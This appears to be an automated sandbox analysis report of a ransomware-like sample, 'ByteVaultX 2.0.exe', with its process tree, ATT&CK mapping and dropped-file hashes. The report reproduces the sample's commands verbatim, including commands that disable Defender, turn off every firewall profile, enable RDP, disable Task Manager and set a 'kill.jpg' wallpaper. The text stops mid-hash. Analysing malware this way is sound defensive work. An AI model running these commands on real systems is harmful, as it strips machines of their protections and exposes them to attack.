Token: 36	5012	powershell.exe
Token: SeDebugPrivilege	3856	powershell.exe
Token: SeDebugPrivilege	2780	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	2780	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	2780	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	2780	MicrosoftEdgeCP.exe
Token: SeIncreaseQuotaPrivilege	3856	powershell.exe
Token: SeSecurityPrivilege	3856	powershell.exe
Token: SeTakeOwnershipPrivilege	3856	powershell.exe
Token: SeLoadDriverPrivilege	3856	powershell.exe
Token: SeSystemProfilePrivilege	3856	powershell.exe
Token: SeSystemtimePrivilege	3856	powershell.exe
Token: SeProfSingleProcessPrivilege	3856	powershell.exe
Token: SeIncBasePriorityPrivilege	3856	powershell.exe
Token: SeCreatePagefilePrivilege	3856	powershell.exe
Token: SeBackupPrivilege	3856	powershell.exe
Token: SeRestorePrivilege	3856	powershell.exe
Token: SeShutdownPrivilege	3856	powershell.exe
Token: SeDebugPrivilege	3856	powershell.exe
Token: SeSystemEnvironmentPrivilege	3856	powershell.exe
Token: SeRemoteShutdownPrivilege	3856	powershell.exe
Token: SeUndockPrivilege	3856	powershell.exe
Token: SeManageVolumePrivilege	3856	powershell.exe
Token: 33	3856	powershell.exe
Token: 34	3856	powershell.exe
Token: 35	3856	powershell.exe
Token: 36	3856	powershell.exe
Token: SeDebugPrivilege	3564	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	3564	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	3564	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	1812	powershell.exe
Token: SeIncreaseQuotaPrivilege	1812	powershell.exe
Token: SeSecurityPrivilege	1812	powershell.exe
Token: SeTakeOwnershipPrivilege	1812	powershell.exe
Token: SeLoadDriverPrivilege	1812	powershell.exe
Token: SeSystemProfilePrivilege	1812	powershell.exe
Token: SeSystemtimePrivilege	1812	powershell.exe
Token: SeProfSingleProcessPrivilege	1812	powershell.exe
Token: SeIncBasePriorityPrivilege	1812	powershell.exe
Token: SeCreatePagefilePrivilege	1812	powershell.exe
Token: SeBackupPrivilege	1812	powershell.exe
Token: SeRestorePrivilege	1812	powershell.exe
Token: SeShutdownPrivilege	1812	powershell.exe

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

MicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exe

pid process

832 MicrosoftEdge.exe
4440 MicrosoftEdgeCP.exe
2780 MicrosoftEdgeCP.exe
4440 MicrosoftEdgeCP.exe

pid	process
832	MicrosoftEdge.exe
4440	MicrosoftEdgeCP.exe
2780	MicrosoftEdgeCP.exe
4440	MicrosoftEdgeCP.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

ByteVaultX 2.0.exeByteVaultX 2.0.execmd.exeMicrosoftEdgeCP.exepowershell.exe

description	pid	process	target process
PID 1388 wrote to memory of 552	1388	ByteVaultX 2.0.exe	ByteVaultX 2.0.exe
PID 1388 wrote to memory of 552	1388	ByteVaultX 2.0.exe	ByteVaultX 2.0.exe
PID 552 wrote to memory of 5012	552	ByteVaultX 2.0.exe	powershell.exe
PID 552 wrote to memory of 5012	552	ByteVaultX 2.0.exe	powershell.exe
PID 552 wrote to memory of 1812	552	ByteVaultX 2.0.exe	powershell.exe
PID 552 wrote to memory of 1812	552	ByteVaultX 2.0.exe	powershell.exe
PID 552 wrote to memory of 4196	552	ByteVaultX 2.0.exe	runas.exe
PID 552 wrote to memory of 4196	552	ByteVaultX 2.0.exe	runas.exe
PID 552 wrote to memory of 1368	552	ByteVaultX 2.0.exe	cmd.exe
PID 552 wrote to memory of 1368	552	ByteVaultX 2.0.exe	cmd.exe
PID 1368 wrote to memory of 3420	1368	cmd.exe	netsh.exe
PID 1368 wrote to memory of 3420	1368	cmd.exe	netsh.exe
PID 1368 wrote to memory of 4184	1368	cmd.exe	reg.exe
PID 1368 wrote to memory of 4184	1368	cmd.exe	reg.exe
PID 1368 wrote to memory of 3876	1368	cmd.exe	reg.exe
PID 1368 wrote to memory of 3876	1368	cmd.exe	reg.exe
PID 1368 wrote to memory of 3692	1368	cmd.exe	reg.exe
PID 1368 wrote to memory of 3692	1368	cmd.exe	reg.exe
PID 1368 wrote to memory of 3856	1368	cmd.exe	powershell.exe
PID 1368 wrote to memory of 3856	1368	cmd.exe	powershell.exe
PID 1368 wrote to memory of 1812	1368	cmd.exe	powershell.exe
PID 1368 wrote to memory of 1812	1368	cmd.exe	powershell.exe
PID 4440 wrote to memory of 3564	4440	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 4440 wrote to memory of 3564	4440	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 4440 wrote to memory of 3564	4440	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 4440 wrote to memory of 3564	4440	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 1368 wrote to memory of 3204	1368	cmd.exe	powershell.exe
PID 1368 wrote to memory of 3204	1368	cmd.exe	powershell.exe
PID 1368 wrote to memory of 2196	1368	cmd.exe	powershell.exe
PID 1368 wrote to memory of 2196	1368	cmd.exe	powershell.exe
PID 1368 wrote to memory of 4648	1368	cmd.exe	powershell.exe
PID 1368 wrote to memory of 4648	1368	cmd.exe	powershell.exe
PID 1368 wrote to memory of 2588	1368	cmd.exe	netsh.exe
PID 1368 wrote to memory of 2588	1368	cmd.exe	netsh.exe
PID 1368 wrote to memory of 2928	1368	cmd.exe	netsh.exe
PID 1368 wrote to memory of 2928	1368	cmd.exe	netsh.exe
PID 1368 wrote to memory of 3420	1368	cmd.exe	netsh.exe
PID 1368 wrote to memory of 3420	1368	cmd.exe	netsh.exe
PID 1368 wrote to memory of 2600	1368	cmd.exe	netsh.exe
PID 1368 wrote to memory of 2600	1368	cmd.exe	netsh.exe
PID 1368 wrote to memory of 1868	1368	cmd.exe	netsh.exe
PID 1368 wrote to memory of 1868	1368	cmd.exe	netsh.exe
PID 1368 wrote to memory of 4084	1368	cmd.exe	netsh.exe
PID 1368 wrote to memory of 4084	1368	cmd.exe	netsh.exe
PID 1368 wrote to memory of 4716	1368	cmd.exe	netsh.exe
PID 1368 wrote to memory of 4716	1368	cmd.exe	netsh.exe
PID 1368 wrote to memory of 4680	1368	cmd.exe	powershell.exe
PID 1368 wrote to memory of 4680	1368	cmd.exe	powershell.exe
PID 1368 wrote to memory of 2340	1368	cmd.exe	powershell.exe
PID 1368 wrote to memory of 2340	1368	cmd.exe	powershell.exe
PID 1368 wrote to memory of 3548	1368	cmd.exe	powershell.exe
PID 1368 wrote to memory of 3548	1368	cmd.exe	powershell.exe
PID 1368 wrote to memory of 3088	1368	cmd.exe	powershell.exe
PID 1368 wrote to memory of 3088	1368	cmd.exe	powershell.exe
PID 1368 wrote to memory of 4688	1368	cmd.exe	powershell.exe
PID 1368 wrote to memory of 4688	1368	cmd.exe	powershell.exe
PID 1368 wrote to memory of 3856	1368	cmd.exe	powershell.exe
PID 1368 wrote to memory of 3856	1368	cmd.exe	powershell.exe
PID 1368 wrote to memory of 628	1368	cmd.exe	powershell.exe
PID 1368 wrote to memory of 628	1368	cmd.exe	powershell.exe
PID 1368 wrote to memory of 1032	1368	cmd.exe	powershell.exe
PID 1368 wrote to memory of 1032	1368	cmd.exe	powershell.exe
PID 1032 wrote to memory of 3344	1032	powershell.exe	cmd.exe
PID 1032 wrote to memory of 3344	1032	powershell.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe
"C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1388

C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe
"C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"
2⤵
- Checks computer location settings
- Loads dropped DLL
- Drops desktop.ini file(s)
- Suspicious use of WriteProcessMemory
PID:552

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5012

C:\Windows\SYSTEM32\netsh.exe
netsh advfirewall set allprofiles state off
3⤵
- Modifies Windows Firewall
PID:1812

C:\Windows\SYSTEM32\runas.exe
runas /user:NT-AUTORITÄT\SYSTEM cmd.exe /c "C:\Encrypt\encrypt.bat"
3⤵
PID:4196

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Encrypt\encrypt.bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:1368

C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
4⤵
PID:3420

C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
4⤵
PID:4184

C:\Windows\system32\reg.exe
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
4⤵
PID:3876

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
4⤵
PID:3692

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3856

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1812

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableScriptScanning $true"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3204

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableEmailProtection $true"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2196

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4648

C:\Windows\system32\netsh.exe
netsh firewall set opmode disable
4⤵
- Modifies Windows Firewall
PID:2588

C:\Windows\system32\netsh.exe
netsh firewall set opmode mode=DISABLE
4⤵
- Modifies Windows Firewall
PID:2928

C:\Windows\system32\netsh.exe
netsh advfirewall set currentprofile state off
4⤵
- Modifies Windows Firewall
PID:3420

C:\Windows\system32\netsh.exe
netsh advfirewall set domainprofile state off
4⤵
- Modifies Windows Firewall
PID:2600

C:\Windows\system32\netsh.exe
netsh advfirewall set privateprofile state off
4⤵
- Modifies Windows Firewall
PID:1868

C:\Windows\system32\netsh.exe
netsh advfirewall set publicprofile state off
4⤵
- Modifies Windows Firewall
PID:4084

C:\Windows\system32\netsh.exe
netsh advfirewall set allprofiles state off
4⤵
- Modifies Windows Firewall
PID:4716

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4680

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2340

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3548

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableScriptScanning $true"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3088

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableEmailProtection $true"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4688

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3856

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://images.pexels.com/photos/970517/pexels-photo-970517.jpeg?cs=srgb&dl=pexels-mitja-juraja-357365-970517.jpg&fm=jpg', 'C:\Users\Admin\Desktop\kill.jpg')"
4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:628

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"
4⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1032

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"
5⤵
PID:3344

C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
6⤵
PID:372

C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
6⤵
PID:2064

C:\Windows\system32\reg.exe
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
6⤵
PID:2632

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
6⤵
PID:5092

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4732

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:224

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableScriptScanning $true"
6⤵
- Command and Scripting Interpreter: PowerShell
PID:68

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableEmailProtection $true"
6⤵
- Command and Scripting Interpreter: PowerShell
PID:2540

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
6⤵
- Command and Scripting Interpreter: PowerShell
PID:1944

C:\Windows\system32\netsh.exe
netsh firewall set opmode disable
6⤵
- Modifies Windows Firewall
PID:4188

C:\Windows\system32\netsh.exe
netsh firewall set opmode mode=DISABLE
6⤵
- Modifies Windows Firewall
PID:3860

C:\Windows\system32\netsh.exe
netsh advfirewall set currentprofile state off
6⤵
- Modifies Windows Firewall
PID:4592

C:\Windows\system32\netsh.exe
netsh advfirewall set domainprofile state off
6⤵
- Modifies Windows Firewall
PID:624

C:\Windows\system32\netsh.exe
netsh advfirewall set privateprofile state off
6⤵
- Modifies Windows Firewall
PID:68

C:\Windows\system32\netsh.exe
netsh advfirewall set publicprofile state off
6⤵
- Modifies Windows Firewall
PID:4264

C:\Windows\system32\netsh.exe
netsh advfirewall set allprofiles state off
6⤵
- Modifies Windows Firewall
PID:2260

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
6⤵
- Command and Scripting Interpreter: PowerShell
PID:372

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
6⤵
- Command and Scripting Interpreter: PowerShell
PID:4948

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
6⤵
- Command and Scripting Interpreter: PowerShell
PID:3204

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableScriptScanning $true"
6⤵
- Command and Scripting Interpreter: PowerShell
PID:4432

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableEmailProtection $true"
6⤵
- Command and Scripting Interpreter: PowerShell
PID:1964

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
6⤵
- Command and Scripting Interpreter: PowerShell
PID:2088

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://images.pexels.com/photos/970517/pexels-photo-970517.jpeg?cs=srgb&dl=pexels-mitja-juraja-357365-970517.jpg&fm=jpg', 'C:\Users\Admin\Desktop\kill.jpg')"
6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
PID:3536

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"
6⤵
- Command and Scripting Interpreter: PowerShell
PID:4540

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"
7⤵
PID:520

C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
8⤵
PID:5072

C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
8⤵
PID:2564

C:\Windows\system32\reg.exe
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
8⤵
PID:4592

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
8⤵
PID:4184

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
8⤵
- Command and Scripting Interpreter: PowerShell
PID:1004

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
8⤵
- Command and Scripting Interpreter: PowerShell
PID:4148

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableScriptScanning $true"
8⤵
- Command and Scripting Interpreter: PowerShell
PID:1868

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://images.pexels.com/photos/970517/pexels-photo-970517.jpeg?cs=srgb&dl=pexels-mitja-juraja-357365-970517.jpg&fm=jpg', 'C:\Users\Admin\Desktop\kill.jpg')"
6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
PID:4984

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f
6⤵
- Sets desktop wallpaper using registry
PID:4100

C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
6⤵
PID:1352

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://images.pexels.com/photos/970517/pexels-photo-970517.jpeg?cs=srgb&dl=pexels-mitja-juraja-357365-970517.jpg&fm=jpg', 'C:\Users\Admin\Desktop\kill.jpg')"
4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1952

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f
4⤵
- Sets desktop wallpaper using registry
PID:5048

C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
4⤵
PID:2892

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:832

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:4800

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4440

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2780

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:3564

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:68

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:1600

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Defacement

T1491

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Encrypt\encrypt.bat
Filesize
2KB

MD5
d4b8e7c1b0ee37229b53d8d3c7348af0

SHA1
3467311b4001a759e24b72cf8ec7606219d4c1cc

SHA256
f9f88ccdb3900863a2747809a9e4fe3acd4f52387c2b8e47eebe40bcce5d3fe1

SHA512
fe5bab00cf03784b34475d5bfdd29bd625d12137f6b3a96afa9435833fef639e33e4e5357c772fac829232cea20a9ebd81435d4621173722d04846ee915e2863

Download Submit
C:\Encrypt\encrypt.html
Filesize
1KB

MD5
60722a327960e4b4f5d967101a72ed06

SHA1
04109aaa12c19c7cb4c062b34d4ab4bfe4f52c5e

SHA256
3441d2b980fc2b4504c2308e6ec5da713c6bb0afd0ca9c846eec198cd1e2edfd

SHA512
98812a8546200353ae3c81733963082cbc6f2041b21d3897a5f26b63fbb0b730d81ab438286bdbdaef9eac8bfe3fe81fddabef2c0fd5f000a4279828bfdad896

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
ad5cd538ca58cb28ede39c108acb5785

SHA1
1ae910026f3dbe90ed025e9e96ead2b5399be877

SHA256
c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033

SHA512
c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\L5P12AEX\edgecompatviewlist[1].xml
Filesize
74KB

MD5
d4fc49dc14f63895d997fa4940f24378

SHA1
3efb1437a7c5e46034147cbbc8db017c69d02c31

SHA256
853d2f4eb81c9fdcea2ee079f6faf98214b111b77cdf68709b38989d123890f1

SHA512
cc60d79b4afe5007634ac21dc4bc92081880be4c0d798a1735b63b27e936c02f399964f744dc73711987f01e8a1064b02a4867dd6cac27538e5fbe275cc61e0a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
8789b605c92fa3c2c0cc43d79ec7275d

SHA1
635f447b9c113018bb380bce6922cd7c52567782

SHA256
26480747a08ba9b89cb374f25f21dad6064679f59057ccd87035ef20b8b4df8c

SHA512
f245647f20a6b51fc7da5e2136ea08a9d98523f41183e061c3f21cc9f44c8c51247eb50be16078097a8ff94a2b010f5bcb59b48b7870b8c643f3e2ecc893565c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
1858461e4e9ea22f7369f1de2c110718

SHA1
5b83f3f7fae00ee04809539263a65e6868539895

SHA256
9f32cbc0282feda207bd3d105450e3a9c4e4eb3aedc360ae2aad93bb28664b72

SHA512
108662138c1ded7e7e405436eea8d4e36bd9830cc43fc8c85d28ec0b8a69e08a4265bb0258bb7c08da326db1ddf37c8dae05db8710298649a96e3a3cbc1b4c93

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
bbe821dc9b703775191193c8400e9d28

SHA1
5253fea34df8dceb2348e75455e26f48757ab9b1

SHA256
b1d41b05991b481ea60f97c4c7e6a5d8d9097baa45bd91681d7f3f8542b7a435

SHA512
ffc74e71b662a8d30095be67b25c6153fe4b357dff223b3f7ce7221d08364e6695a28452fbaf75f44cfad284d634a11910239aaabe88ab4337d3204fee69ca3b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
55eb308adeec20c0943ea561b1197ce8

SHA1
002230c87143208ab0e566efc50c96916a0f0d69

SHA256
e07ee0ed7667c4fd708ed2c5ddd3a3a513b8c7162fdec178065ee6eb52e92630

SHA512
6d5c3a689581bec494a7f556d48f1788ff68af0b1544411394f5ba2699ac3edd8f252c3c4cbb34ed81d4bccaf6237661c75d82ef315c2892b140aeebbf580822

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
a4323dcaa1dc3b5b3c7dcdefeef479ae

SHA1
c00c7eb78986fe97801d8b08c0daa1d3afc4367d

SHA256
ed64582cde73d7655022cceaf9b7fde407dff28272b3d38e33144363ddfa6a2b

SHA512
4aac9f552a84a80c5c988f98accaac25e306d65a315405b7b99db4cf45943c84c2dd3aba4dca936ecfa8753d41119bf7d4c1b3a8c41378a3d3d159551c461976

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
0decb8045a04687582b15bae2c5fa960

SHA1
6776fbb62e310052fb8ec434d03b888a5c6e4254

SHA256
1bc7f5ffa4a46d8775c9dd8da74b19ad6ac8be2963ec03eca3717adb7ff39d80

SHA512
09ea11351de846bc8f19ed7f80f4f80d1f17b93b52ebada02af60e83875be54ac9d99338d8bb593ed58f29797ba8cc855ed2febe7c0c023eef4b198a3ccbff8f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
42a14583acfb387735f6070f205a4913

SHA1
d614d4ee0bd8b85ab033a6b40e7adbc650458387

SHA256
d967d759f6eeddc1bc563332ab8ee9ab3d7a4381c146211148399973217f0094

SHA512
bf3f57851bd2b2ddc57e31d9307d7ab62eb81fe3c1c198a4715d38aa9797ff8accda2a75335197a6c9e5a0075de9eee9594ac8d155c4333dc494e45711b21bfc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
d428910b9840cfd35724499f1a73550c

SHA1
8b8b55444a0ad0ed261dca1588125d6439dfa81a

SHA256
eb45a674d57be1790f91e0ff6116160c57766c9b8c69bdd25c0e3349a28c59c0

SHA512
